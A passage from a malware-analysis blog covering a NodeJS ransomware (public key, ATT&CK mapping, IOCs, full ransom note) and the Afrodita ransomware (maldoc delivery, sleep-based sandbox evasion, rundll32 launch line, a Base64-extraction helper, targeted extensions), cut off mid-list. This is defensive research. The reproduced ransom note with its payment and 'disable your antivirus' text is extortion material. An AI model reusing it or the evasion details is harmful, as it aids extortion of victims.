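<p>The rejection loop is kept on purpose: the "must contain all three classes" rule does not add entropy, it only trims the space slightly, and it does nothing to repair a predictable seed.</p>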
<h3><strong>Work in Progress</strong></h3>
<p></br></p>
<p>The Public Key Blob is embedded into the Javascript code as well:</p>
<div class="highlight"><pre><span></span><span class="o">-----</span><span class="nv">BEGIN</span> <span class="nv">PUBLIC</span> <span class="nv">KEY</span><span class="o">-----</span>
<span class="nv">MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA403SyYJw3sUvumo0Gsjy</span>\<span class="nv">nFoPgFtOEJ4ZxIhsw9MX3E</span><span class="o">/</span>
<span class="nv">PpM3OxQqQitQtAfaKSTYT39s9kprxuFtW6ZXB</span><span class="o">/</span><span class="nv">lNUp</span>\<span class="nv">nMm9IZfbYyELUMyi</span><span class="o">+</span><span class="nv">zHKkIi8PKEGdASogYD84VDkVPkVh</span>
<span class="nv">aXB2YvNeyJ7Rhup2SubG</span>\<span class="nv">nO7MYtOYM57TOOHT</span><span class="o">/</span><span class="nv">DDCX5Q3AEXPSMvSMgPgZ6hSKuVAgOhztcvgxMH3sYNQbNwL</span>\<span class="nv">nj</span>
<span class="nv">LD1MCk6eoVDqTRvarE9IoLjdBuGhbWJQ7afWkAAEv0vriPI22F5MAhhZLhuKjCg</span>\<span class="nv">nTNELFzvWQEKWsZMyZS70V5w</span>
<span class="nv">CGqCuocrmGFPBeS4ZdHS3W94jA18a36m8V76tnlbz</span>\<span class="nv">n</span><span class="o">/</span><span class="nv">gnWdtY81jBPdnHiXp22tIswtrpN</span><span class="o">+</span><span class="mi">5</span><span class="nv">UNn7A1WHhBkfdPp</span>
<span class="nv">iyHRzTmnYmLHKHPyYkR</span>\<span class="nv">nGJj74fUiAuvwlCmmE3rfwH9uBuL3v</span><span class="o">+</span><span class="nv">plMCbRs3Log09Q4GyTYd2Z2OacWTE4gRCf</span>\<span class="nv">n2</span>
<span class="mi">3</span><span class="nv">wCYkyeZrfXhnFmH0TGsQak0lznZBkudJOL7Ms1NUIWa1zd</span><span class="o">/</span><span class="nv">gqUGROR1Mb</span><span class="o">/</span><span class="nv">BYVt</span>\<span class="nv">nzmBo4VMak6RCwvuXhPmR</span><span class="o">+</span><span class="nv">br</span>
<span class="nv">gb6ul</span><span class="o">+</span><span class="mi">74</span><span class="nv">F0fHEsyBQoeurj9EqAVxmD4jMnzwQi1HB</span>\<span class="nv">nEqOGcc2mAQvtVtgU17MQqVS3JFiYZTNn1SWuTUJCAF</span><span class="o">+</span><span class="nv">xz</span>
<span class="nv">NgVsjQuQVJZCXa2c4NL</span>\<span class="nv">nK1iOlUsoOxkYTStUIdX1miUCAwEAAQ</span><span class="o">==</span>
<span class="o">-----</span><span class="k">END</span> <span class="nv">PUBLIC</span> <span class="nv">KEY</span><span class="o">-----</span>
</pre></div>
<p><br/></p>
<p>Actually the Ransomware drops two notes: the HTML file and a similarly phrased version of it in a console window:</p>
<p><center><img alt="CLI Ransomnote" src="https://dissectingmalwa.re/img/node-cli.png"></center></p>
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1035</em> --> Service Execution --> Execution</p>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1060</em> --> Registry Run Keys / Start Folder --> Persistence</p>
<p><em>T1055</em> --> Process Injection --> Privilege Escalation</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1055</em> --> Process Injection --> Defense Evasion</p>
<p><em>T1112</em> --> Modify Registry --> Defense Evasion</p>
<p><em>T1107</em> --> File Deletion --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1120</em> --> Peripheral Device Discovery --> Discovery</p>
<p><em>T1057</em> --> Process Discovery --> Discovery</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>NodeJS Ransom</h3>
<div class="highlight"><pre><span></span><span class="n">GFp0JAk</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 3a97828f05008741097242c3e23612010c72f7b987037c30050cd283cd7cbcfb</span>
<span class="mi">4</span><span class="n">cdfb03db53a05603f6a096cf477dfdc</span><span class="p">.</span><span class="n">vbs</span> <span class="c1">--> SHA256: 90acae3f682f01864e49c756bc9d46f153fcc4a7e703fd1723a8aa7ec01b378c</span>
<span class="n">lLT8PCI</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: 53a95c9126be8262afb0821da4d7137e6c8a4d9b363f91298249ca134d394bf4</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">fs</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: a54b9999ae69328c2ac676e255d0f7767f2083c5c95e1db98d15ae44e3d68896</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">package</span><span class="p">.</span><span class="n">json</span> <span class="c1">--> SHA256: 9bd1f57b72c1dede710f6f12ee3f713461d7667776d734b043884e18705505e4</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: d4f59f5bea29583031919657f6a4a29554962cf48b61a6c4a5a22f37f4d3963e</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">legacy</span><span class="o">-</span><span class="n">streams</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: 5727b9a8597dc68011961504513ca8ce7caaf6df2431b2861d4f9d7af5f9465c</span>
<span class="n">GFp0JAk</span><span class="err">\</span><span class="n">node_modules</span><span class="err">\</span><span class="n">graceful</span><span class="o">-</span><span class="n">fs</span><span class="err">\</span><span class="n">polyfills</span><span class="p">.</span><span class="n">js</span> <span class="c1">--> SHA256: 36b3c0109afc06172fe3a7a521700b0eb13ab58d221081c5411920b4657b5841</span>
</pre></div>
<h3>E-Mail Addresses / Contact</h3>
<div class="highlight"><pre><span></span><span class="n">n</span><span class="o">/</span><span class="n">a</span>
</pre></div>
<h3>Bitcoin Address</h3>
<div class="highlight"><pre><span></span><span class="mi">18</span><span class="n">aBKwKJvMCkZmpkcCbW9b9y9snAmU3kgo</span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="nv">Your</span> <span class="nv">files</span> <span class="nv">are</span> <span class="nv">encrypted</span><span class="o">!</span> <span class="nv">Encryption</span> <span class="nv">was</span> <span class="nv">produced</span> <span class="nv">using</span> <span class="nv">a</span> <span class="nv">unique</span> <span class="nv">public</span> <span class="nv">key</span> <span class="nv">RSA</span><span class="o">-</span><span class="mi">2048</span> <span class="nv">generated</span> <span class="k">for</span> <span class="nv">this</span> <span class="nv">computer</span>. <span class="nv">To</span>
<span class="nv">decrypt</span> <span class="nv">files</span> <span class="nv">you</span> <span class="nv">need</span> <span class="nv">to</span> <span class="nv">obtain</span> <span class="nv">the</span> <span class="nv">private</span> <span class="nv">key</span>.<span class="nv">The</span> <span class="nv">single</span> <span class="nv">copy</span> <span class="nv">of</span> <span class="nv">the</span> <span class="nv">private</span> <span class="nv">key</span>, <span class="nv">which</span> <span class="nv">will</span> <span class="nv">allow</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">files</span>,
<span class="nv">located</span> <span class="nv">on</span> <span class="nv">a</span> <span class="nv">remote</span> <span class="nv">server</span> <span class="nv">on</span> <span class="nv">the</span> <span class="nv">Internet</span>.<span class="nv">The</span> <span class="nv">server</span> <span class="nv">will</span> <span class="nv">destroy</span> <span class="nv">the</span> <span class="nv">key</span> <span class="nv">after</span> <span class="nv">a</span> <span class="s1">'</span><span class="s"> + tillDate + </span><span class="s1">'</span>. <span class="nv">After</span> <span class="nv">that</span>, <span class="nv">nobody</span>
<span class="nv">will</span> <span class="nv">be</span> <span class="nv">able</span> <span class="nv">to</span> <span class="nv">restore</span> <span class="nv">files</span> ...<span class="nv">To</span> <span class="nv">obtain</span> <span class="nv">the</span> <span class="nv">private</span> <span class="nv">key</span> <span class="k">for</span> <span class="nv">this</span> <span class="nv">computer</span>, <span class="nv">you</span> <span class="nv">need</span> <span class="nv">to</span> <span class="k">send</span>
<span class="mi">0</span>.<span class="mi">4</span> <span class="nv">BTC</span>
<span class="nv">to</span> <span class="nv">bitcoin</span> <span class="nv">address</span>
<span class="mi">18</span><span class="nv">aBKwKJvMCkZmpkcCbW9b9y9snAmU3kgo</span>
<span class="nv">You</span> <span class="nv">can</span> <span class="nv">easily</span> <span class="nv">delete</span> <span class="nv">this</span> <span class="nv">software</span>, <span class="nv">but</span> <span class="nv">know</span> <span class="nv">that</span> <span class="nv">without</span> <span class="nv">it</span>, <span class="nv">you</span> <span class="nv">will</span> <span class="nv">never</span> <span class="nv">be</span> <span class="nv">able</span> <span class="nv">to</span> <span class="nv">get</span> <span class="nv">your</span> <span class="nv">original</span> <span class="nv">files</span> <span class="nv">back</span>.
<span class="nv">Disable</span> <span class="nv">your</span> <span class="nv">antivirus</span> <span class="nv">to</span> <span class="nv">prevent</span> <span class="nv">the</span> <span class="nv">removal</span> <span class="nv">of</span> <span class="nv">this</span> <span class="nv">software</span>.<span class="nv">When</span> <span class="nv">your</span> <span class="nv">transaction</span> <span class="nv">will</span> <span class="nv">be</span> <span class="nv">verified</span> <span class="nv">and</span> <span class="nv">confirmed</span> <span class="nv">you</span>
<span class="nv">will</span> <span class="nv">receive</span> <span class="nv">your</span> <span class="nv">private</span> <span class="nv">key</span>.
<span class="nv">Approximate</span> <span class="nv">destruction</span> <span class="nv">time</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">private</span> <span class="nv">key</span> <span class="s1">'</span><span class="s"> + tillDate + </span><span class="s1">'</span>
<span class="nv">How</span> <span class="nv">to</span> <span class="nv">buy</span> <span class="nv">bitcoins</span>
<span class="nv">Xchange</span>.<span class="nv">cash</span>
<span class="mi">24</span><span class="nv">paybank</span>.<span class="nv">com</span>
<span class="nv">Change</span>.<span class="nv">me</span>
<span class="nv">Kassa</span>.<span class="nv">cc</span>
<span class="nv">Change</span>.<span class="nv">am</span>
<span class="nv">Coinbase</span>.<span class="nv">com</span>
<span class="nv">more</span> <span class="nv">options</span>
<span class="nv">Bestchange</span>.<span class="nv">com</span>
</pre></div>
<p></br></p>
<h1>Not so nice after all - Afrodita Ransomware</h1>
<p><em>2020-01-09, by f0wL</em></p>
<p>A new Ransomware strain spread by malicious Office documents targeted at Croatian systems - let's check it out</p><p><center><img alt="Logo" src="https://dissectingmalwa.re/img/afro-logo.png"></center></p>
<p></br></p>
<p>This strain was first discovered by Korben Dallas on Twitter on the 9th of January. As I already mentioned, the malware is delivered via a malspam/maldoc attack crafted for users / companies from Croatia. Researchers who were involved in the initial analysis: <a href="https://twitter.com/KorbenD_Intel">@KorbenD_Intel</a>, <a href="https://twitter.com/James_inthe_box">@James_inthe_box</a>, <a href="https://twitter.com/Malwageddon">@Malwageddon</a>, <a href="https://twitter.com/pollo290987">@pollo290987</a> and I (<a href="https://twitter.com/f0wlsec">@f0wlsec</a>). Thank you for your contributions!</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/James_inthe_box?ref_src=twsrc%5Etfw">@James_inthe_box</a> <a href="https://twitter.com/malwrhunterteam?ref_src=twsrc%5Etfw">@malwrhunterteam</a> <a href="https://twitter.com/Malwageddon?ref_src=twsrc%5Etfw">@Malwageddon</a> <br>69450923d812f3696e8280508b636955 XLS 12/60 VT scan detections. Not nice.. upped to Malshare: <a href="https://t.co/jXxXrJxcB9">https://t.co/jXxXrJxcB9</a> <a href="https://t.co/TPfP0BCZOB">pic.twitter.com/TPfP0BCZOB</a></p>— Korben Dallas (@KorbenD_Intel) <a href="https://twitter.com/KorbenD_Intel/status/1215385296537358343?ref_src=twsrc%5Etfw">January 9, 2020</a></blockquote></center></p>
<p></br></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>Afrodita @ <a href="https://app.any.run/tasks/ba401399-4714-4b94-9208-b08351ff0220">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b?environmentId=100">HybridAnalysis</a>
--> <code>sha256 9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b</code></p>
<p></br></p>
<p>Here you can see three images extracted from the malicious Excel Docs. Funny how they didn't even bother to think of a fake company name for the second Logo :D</p>
<p><center><img alt="Sleep Meme" height="450px" width="360px" src="https://dissectingmalwa.re/img/afro-maldoc.png"></center></p>
<p><br/></p>
<p>Afrodita uses a sleep routine for sandbox evasion. In my tests it took 30-60 minutes until the system was infected.</p>
<p><center><img alt="Sleep Meme" height="450px" width="360px" src="https://dissectingmalwa.re/img/afro-meme.png"></center></p>
<p><br/></p>
<p>After unpacking the sample with UPX, <em>Detect it easy</em> returns the following:</p>
<p><center><img alt="Detect it easy" height="450px" width="360px" src="https://dissectingmalwa.re/img/afro-die.png"></center></p>
<p><center>It was likely built with a very new version of Visual Studio (2019)</center></p>
<p><br/></p>
<p>Below you can see a screenshot of the Imports tab in PE-bear.</p>
<p><center><img alt="PEBear Imports" height="450px" width="360px" src="https://dissectingmalwa.re/img/afro-imports.png"></center></p>
<p><br/></p>
<p>The extracted strings tell us quite a lot in this case. It looks like the internal name of the project is <em>Afrodita</em> and it utilizes the CryptoPP library. There are some references to .key files, but I haven't found a path or file on an infected machine yet. <strong>README_RECOVERY.txt</strong> will be the filename of the ransom note. Its contents are embedded in the binary's .data section with Base64 encoding. Lastly, <em>Afrodita.dll</em> is the rewritten file that is downloaded as a payload (originally notnice.jpg or verynice.jpg). It's executed via <strong>rundll32.exe Afrodita.dll,Sura</strong>.</p>
<p></br></p>
<p><center><img alt="Strings" src="https://dissectingmalwa.re/img/afro-strings.png"></center></p>
<p><br/></p>
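<p>A Base64-encoded note inside a section is easy to miss with plain <code>strings</code>, so here is an added Python helper for pulling such blobs out of a raw dump (it is not Afrodita's code or the post's own tooling). It does not parse the PE format: point it at a section dump or the whole file and it scans for long Base64 runs, decodes them and keeps only the ones that decode to readable text. The sample bytes below are constructed, including a run of 'A's that is valid Base64 but decodes to NULs and therefore must be filtered out.</p>

```python
import base64
import binascii
import re

# Base64 runs: at least 12 whole 4-char groups, optionally ending in a padded group.
B64_RUN = re.compile(rb"(?:[A-Za-z0-9+/]{4}){12,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")


def looks_like_text(data: bytes, min_ratio: float = 0.95) -> bool:
    """True when nearly every decoded byte is printable ASCII or whitespace."""
    if not data:
        return False
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) >= min_ratio


def find_base64_text(blob: bytes, min_chars: int = 48):
    """Return (offset, decoded_text) for every Base64 run that decodes to text.

    Runs shorter than min_chars are ignored (symbol names and short tokens are
    valid Base64 too), and runs that decode to binary garbage are dropped.
    """
    hits = []
    for m in B64_RUN.finditer(blob):
        run = m.group(0)
        if len(run) < min_chars:
            continue
        try:
            decoded = base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue
        if looks_like_text(decoded):
            hits.append((m.start(), decoded.decode("utf-8", errors="replace")))
    return hits


# CONSTRUCTED stand-in for a .data section dump: a filename string, the
# Base64-encoded note, a command-line string and 64 'A's (valid Base64 that
# decodes to 48 NUL bytes, so the text filter has to reject it).
SAMPLE_NOTE = ("CONSTRUCTED SAMPLE NOTE: your files were encrypted.\n"
               "See README_RECOVERY.txt for the next steps.\n")
SAMPLE_DATA = (b"\x00" * 16
               + b"README_RECOVERY.txt\x00"
               + base64.b64encode(SAMPLE_NOTE.encode("utf-8"))
               + b"\x00" * 8
               + b"rundll32.exe Afrodita.dll,Sura\x00"
               + b"A" * 64)

if __name__ == "__main__":
    for offset, text in find_base64_text(SAMPLE_DATA):
        print(f"Base64 text at offset 0x{offset:x}:\n{text}")
```

<p>Usage on a real sample: read the file (or a section dumped from PE-bear) as bytes and pass it to <code>find_base64_text</code>; the returned offsets are relative to the buffer you passed in, so add the section's file offset yourself if you dumped a section.</p>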
<p>The following filetypes will be encrypted by Afrodita:</p>
<div class="highlight"><pre><span></span><span class="na">.TXT</span><span class="p">,</span> <span class="no">.ZIP</span><span class="p">,</span> <span class="no">.DAT</span><span class="p">,</span> <span class="no">.JPE</span><span class="p">,</span> <span class="no">.JPG</span><span class="p">,</span> <span class="no">.PNG</span><span class="p">,</span> <span class="no">.JPEG</span><span class="p">,</span> <span class="no">.GIF</span><span class="p">,</span> <span class="no">.BMP</span><span class="p">,</span> <span class="no">.EXIF</span><span class="p">,</span> <span class="no">.MP4</span><span class="p">,</span> <span class="no">.RAR</span><span class="p">,</span> <span class="no">.M4A</span><span class="p">,</span> <span class="no">.WMA</span><span class="p">,</span> <span class="no">.AVI</span><span class="p">,</span> <span class="no">.WMV</span><span class="p">,</span> <span class="no">.MKV</span><span class="p">,</span> <span class="no">.CSV</span><span class="p">,</span> <span class="no">.M3U</span><span class="p">,</span> <span class="no">.FLV</span><span class="p">,</span> <span class="no">.WALLET</span><span class="p">,</span> <span class="no">.JAVA</span><span class="p">,</span> <span class="no">.CLASS</span><span class="p">,</span> <span class="no">.HTML</span><span class="p">,</span> <span class="no">.HTM</span><span class="p">,</span> <span class="no">.CSS</span><span class="p">,</span> <span class="no">.LUA</span><span class="p">,</span> <span class="no">.ASP</span><span class="p">,</span> <span class="no">.PHP</span><span class="p">,</span> <span class="no">.INCPAS</span><span class="p">,</span> <span class="no">.ASM</span><span class="p">,</span> <span class="no">.HPP</span><span class="p">,</span> <span class="no">.CPP</span><span class="p">,</span> <span class="no">.SLN</span><span class="p">,</span> <span class="no">.ACCDB</span><span class="p">,</span> <span class="no">.MDB</span><span class="p">,</span> <span class="no">.PPTM</span><span 
class="p">,</span> <span class="no">.PPTX</span><span class="p">,</span> <span class="no">.PPT</span><span class="p">,</span> <span class="no">.XLK</span><span class="p">,</span> <span class="no">.XLSB</span><span class="p">,</span> <span class="no">.XLSM</span><span class="p">,</span> <span class="no">.XLSX</span><span class="p">,</span> <span class="no">.XLS</span><span class="p">,</span> <span class="no">.WPS</span><span class="p">,</span> <span class="no">.DOCM</span><span class="p">,</span> <span class="no">.DOCX</span><span class="p">,</span> <span class="no">.DOC</span><span class="p">,</span> <span class="no">.ODB</span><span class="p">,</span> <span class="no">.ODC</span><span class="p">,</span> <span class="no">.ODM</span><span class="p">,</span> <span class="no">.ODP</span><span class="p">,</span> <span class="no">.ODS</span><span class="p">,</span> <span class="no">.ACCDR</span><span class="p">,</span> <span class="no">.ACCDT</span><span class="p">,</span> <span class="no">.ACCDE</span><span class="p">,</span> <span class="no">.D3DBSP</span><span class="p">,</span> <span class="no">.SIE</span><span class="p">,</span> <span class="no">.SQL</span><span class="p">,</span> <span class="no">.BACKUPDB</span><span class="p">,</span> <span class="no">.BACKUP</span><span class="p">,</span> <span class="no">.BAK</span><span class="p">,</span> <span class="no">.SUM</span><span class="p">,</span> <span class="no">.IBANK</span><span class="p">,</span> <span class="no">.T13</span><span class="p">,</span> <span class="no">.T12</span><span class="p">,</span> <span class="no">.QDF</span><span class="p">,</span> <span class="no">.GDB</span><span class="p">,</span> <span class="no">.TAX</span><span class="p">,</span> <span class="no">.PKPASS</span><span class="p">,</span> <span class="no">.SLDM</span><span class="p">,</span> <span class="no">.SLDX</span><span class="p">,</span> <span class="no">.PPSM</span><span class="p">,</span> <span class="no">.PPSX</span><span 
class="p">,</span> <span class="no">.PPAM</span><span class="p">,</span> <span class="no">.POTM</span><span class="p">,</span> <span class="no">.POTX</span><span class="p">,</span> <span class="no">.PPS</span><span class="p">,</span> <span class="no">.POT</span><span class="p">,</span> <span class="no">.XLW</span><span class="p">,</span> <span class="no">.XLL</span><span class="p">,</span> <span class="no">.XLAM</span><span class="p">,</span> <span class="no">.XLA</span><span class="p">,</span> <span class="no">.XLTM</span><span class="p">,</span> <span class="no">.XLTX</span><span class="p">,</span> <span class="no">.XLM</span><span class="p">,</span> <span class="no">.XLT</span><span class="p">,</span> <span class="no">.DOTM</span><span class="p">,</span> <span class="no">.DOTX</span><span class="p">,</span> <span class="no">.DOT</span><span class="p">,</span> <span class="no">.BC6</span><span class="p">,</span> <span class="no">.BC7</span><span class="p">,</span> <span class="no">.BKP</span><span class="p">,</span> <span class="no">.QIC</span><span class="p">,</span> <span class="no">.BKF</span><span class="p">,</span> <span class="no">.SIDN</span><span class="p">,</span> <span class="no">.SIDD</span><span class="p">,</span> <span class="no">.MDDATA</span><span class="p">,</span> <span class="no">.ITL</span><span class="p">,</span> <span class="no">.ITDB</span><span class="p">,</span> <span class="no">.ICXS</span><span class="p">,</span> <span class="no">.HVPL</span><span class="p">,</span> <span class="no">.HPLG</span><span class="p">,</span> <span class="no">.HKDB</span><span class="p">,</span> <span class="no">.MDBACKUP</span><span class="p">,</span> <span class="no">.SYNCDB</span><span class="p">,</span> <span class="no">.GHO</span><span class="p">,</span> <span class="no">.CAS</span><span class="p">,</span> <span class="no">.SVG</span><span class="p">,</span> <span class="no">.MAP</span><span class="p">,</span> <span class="no">.WMO</span><span 
class="p">,</span> <span class="no">.ITM</span><span class="p">,</span> <span class="no">.FOS</span><span class="p">,</span> <span class="no">.MOV</span><span class="p">,</span> <span class="no">.VDF</span><span class="p">,</span> <span class="no">.ZTMP</span><span class="p">,</span> <span class="no">.SIS</span><span class="p">,</span> <span class="no">.SID</span><span class="p">,</span> <span class="no">.NCF</span><span class="p">,</span> <span class="no">.MENU</span><span class="p">,</span> <span class="no">.LAYOUT</span><span class="p">,</span> <span class="no">.DMP</span><span class="p">,</span> <span class="no">.BLOB</span><span class="p">,</span> <span class="no">.ESM</span><span class="p">,</span> <span class="no">.VCF</span><span class="p">,</span> <span class="no">.VTF</span><span class="p">,</span> <span class="no">.DAZIP</span><span class="p">,</span> <span class="no">.FPK</span><span class="p">,</span> <span class="no">.MLX</span><span class="p">,</span> <span class="no">.IWD</span><span class="p">,</span> <span class="no">.VPK</span><span class="p">,</span> <span class="no">.TOR</span><span class="p">,</span> <span class="no">.PSK</span><span class="p">,</span> <span class="no">.RIM</span><span class="p">,</span> <span class="no">.W3X</span><span class="p">,</span> <span class="no">.FSH</span><span class="p">,</span> <span class="no">.NTL</span><span class="p">,</span> <span class="no">.ARCH00</span><span class="p">,</span> <span class="no">.LVL</span><span class="p">,</span> <span class="no">.SNX</span><span class="p">,</span> <span class="no">.CFR</span><span class="p">,</span> <span class="no">.VPP_PC</span><span class="p">,</span> <span class="no">.LRF</span><span class="p">,</span> <span class="no">.MCMETA</span><span class="p">,</span> <span class="no">.VFS0</span><span class="p">,</span> <span class="no">.MPQGE</span><span class="p">,</span> <span class="no">.KDB</span><span class="p">,</span> <span class="no">.DB0</span><span class="p">,</span> 
<span class="no">.DBA</span><span class="p">,</span> <span class="no">.ROFL</span><span class="p">,</span> <span class="no">.HKX</span><span class="p">,</span> <span class="no">.BAR</span><span class="p">,</span> <span class="no">.UPK</span><span class="p">,</span> <span class="no">.DAS</span><span class="p">,</span> <span class="no">.IWI</span><span class="p">,</span> <span class="no">.LITEMOD</span><span class="p">,</span> <span class="no">.ASSET</span><span class="p">,</span> <span class="no">.FORGE</span><span class="p">,</span> <span class="no">.LTX</span><span class="p">,</span> <span class="no">.BSA</span><span class="p">,</span> <span class="no">.APK</span><span class="p">,</span> <span class="no">.RE4</span><span class="p">,</span> <span class="no">.SAV</span><span class="p">,</span> <span class="no">.LBF</span><span class="p">,</span> <span class="no">.SLM</span><span class="p">,</span> <span class="no">.BIK</span><span class="p">,</span> <span class="no">.EPK</span><span class="p">,</span> <span class="no">.RGSS3A</span><span class="p">,</span> <span class="no">.PAK</span><span class="p">,</span> <span class="no">.BIG</span><span class="p">,</span> <span class="no">.WOTREPLAY</span><span class="p">,</span> <span class="no">.XXX</span><span class="p">,</span> <span class="no">.DESC</span><span class="p">,</span> <span class="no">.P7C</span><span class="p">,</span> <span class="no">.P7B</span><span class="p">,</span> <span class="no">.P12</span><span class="p">,</span> <span class="no">.PFX</span><span class="p">,</span> <span class="no">.PEM</span><span class="p">,</span> <span class="no">.CRT</span><span class="p">,</span> <span class="no">.CER</span><span class="p">,</span> <span class="no">.DER</span><span class="p">,</span> <span class="no">.X3F</span><span class="p">,</span> <span class="no">.SRW</span><span class="p">,</span> <span class="no">.PEF</span><span class="p">,</span> <span class="no">.PTX</span><span class="p">,</span> <span class="no">.R3D</span><span 
class="p">,</span> <span class="no">.RW2</span><span class="p">,</span> <span class="no">.RWL</span><span class="p">,</span> <span class="no">.RAW</span><span class="p">,</span> <span class="no">.RAF</span><span class="p">,</span> <span class="no">.ORF</span><span class="p">,</span> <span class="no">.NRW</span><span class="p">,</span> <span class="no">.MRWREF</span><span class="p">,</span> <span class="no">.MEF</span><span class="p">,</span> <span class="no">.ERF</span><span class="p">,</span> <span class="no">.KDC</span><span class="p">,</span> <span class="no">.DCR</span><span class="p">,</span> <span class="no">.CR2</span><span class="p">,</span> <span class="no">.CRW</span><span class="p">,</span> <span class="no">.BAY</span><span class="p">,</span> <span class="no">.SR2</span><span class="p">,</span> <span class="no">.SRF</span><span class="p">,</span> <span class="no">.ARW</span><span class="p">,</span> <span class="no">.3FR</span><span class="p">,</span> <span class="no">.DNG</span><span class="p">,</span> <span class="no">.CDR</span><span class="p">,</span> <span class="no">.INDD</span><span class="p">,</span> <span class="no">.EPS</span><span class="p">,</span> <span class="no">.PDF</span><span class="p">,</span> <span class="no">.PDD</span><span class="p">,</span> <span class="no">.PSD</span><span class="p">,</span> <span class="no">.DBF</span><span class="p">,</span> <span class="no">.MDF</span><span class="p">,</span> <span class="no">.WB2</span><span class="p">,</span> <span class="no">.RTF</span><span class="p">,</span> <span class="no">.WPD</span><span class="p">,</span> <span class="no">.DXG</span><span class="p">,</span> <span class="no">.DWG</span><span class="p">,</span> <span class="no">.PST</span><span class="p">,</span> <span class="no">.ODT</span><span class="p">,</span> <span class="no">.DXF</span><span class="p">,</span> <span class="no">.MP3</span><span class="p">,</span> <span class="no">.MRW</span><span class="p">,</span> <span 
class="no">.NEF</span><span class="p">,</span> <span class="no">.JFIF</span><span class="p">,</span> <span class="no">.DRF</span><span class="p">,</span> <span class="no">.BLEND</span><span class="p">,</span> <span class="no">.APJ</span><span class="p">,</span> <span class="no">.3DS</span><span class="p">,</span> <span class="no">.SDA</span><span class="p">,</span> <span class="no">.PAT</span><span class="p">,</span> <span class="no">.FXG</span><span class="p">,</span> <span class="no">.FHD</span><span class="p">,</span> <span class="no">.DXB</span><span class="p">,</span> <span class="no">.DRW</span><span class="p">,</span> <span class="no">.DESIGN</span><span class="p">,</span> <span class="no">.DDRW</span><span class="p">,</span> <span class="no">.DDOC</span><span class="p">,</span> <span class="no">.DCS</span><span class="p">,</span> <span class="no">.CSL</span><span class="p">,</span> <span class="no">.CSH</span><span class="p">,</span> <span class="no">.CPI</span><span class="p">,</span> <span class="no">.CGM</span><span class="p">,</span> <span class="no">.CDX</span><span class="p">,</span> <span class="no">.CDRW</span><span class="p">,</span> <span class="no">.CDR6</span><span class="p">,</span> <span class="no">.CDR5</span><span class="p">,</span> <span class="no">.CDR4</span><span class="p">,</span> <span class="no">.CDR3</span><span class="p">,</span> <span class="no">.AWG</span><span class="p">,</span> <span class="no">.AIT</span><span class="p">,</span> <span class="no">.AGD1</span><span class="p">,</span> <span class="no">.YCBCRA</span><span class="p">,</span> <span class="no">.STX</span><span class="p">,</span> <span class="no">.ST8</span><span class="p">,</span> <span class="no">.ST7</span><span class="p">,</span> <span class="no">.ST6</span><span class="p">,</span> <span class="no">.ST5</span><span class="p">,</span> <span class="no">.ST4</span><span class="p">,</span> <span class="no">.SD1</span><span class="p">,</span> <span 
class="no">.SD0</span><span class="p">,</span> <span class="no">.RWZ</span><span class="p">,</span> <span class="no">.RA2</span><span class="p">,</span> <span class="no">.PCD</span><span class="p">,</span> <span class="no">.NWB</span><span class="p">,</span> <span class="no">.NOP</span><span class="p">,</span> <span class="no">.NDD</span><span class="p">,</span> <span class="no">.MOS</span><span class="p">,</span> <span class="no">.MFW</span><span class="p">,</span> <span class="no">.MDC</span><span class="p">,</span> <span class="no">.KC2</span><span class="p">,</span> <span class="no">.IIQ</span><span class="p">,</span> <span class="no">.GRY</span><span class="p">,</span> <span class="no">.GREY</span><span class="p">,</span> <span class="no">.GRAY</span><span class="p">,</span> <span class="no">.FPX</span><span class="p">,</span> <span class="no">.FFF</span><span class="p">,</span> <span class="no">.EXF</span><span class="p">,</span> <span class="no">.DC2</span><span class="p">,</span> <span class="no">.CRAW</span><span class="p">,</span> <span class="no">.CMT</span><span class="p">,</span> <span class="no">.CIB</span><span class="p">,</span> <span class="no">.CE2</span><span class="p">,</span> <span class="no">.CE1</span><span class="p">,</span> <span class="no">.3PR</span><span class="p">,</span> <span class="no">.MPG</span><span class="p">,</span> <span 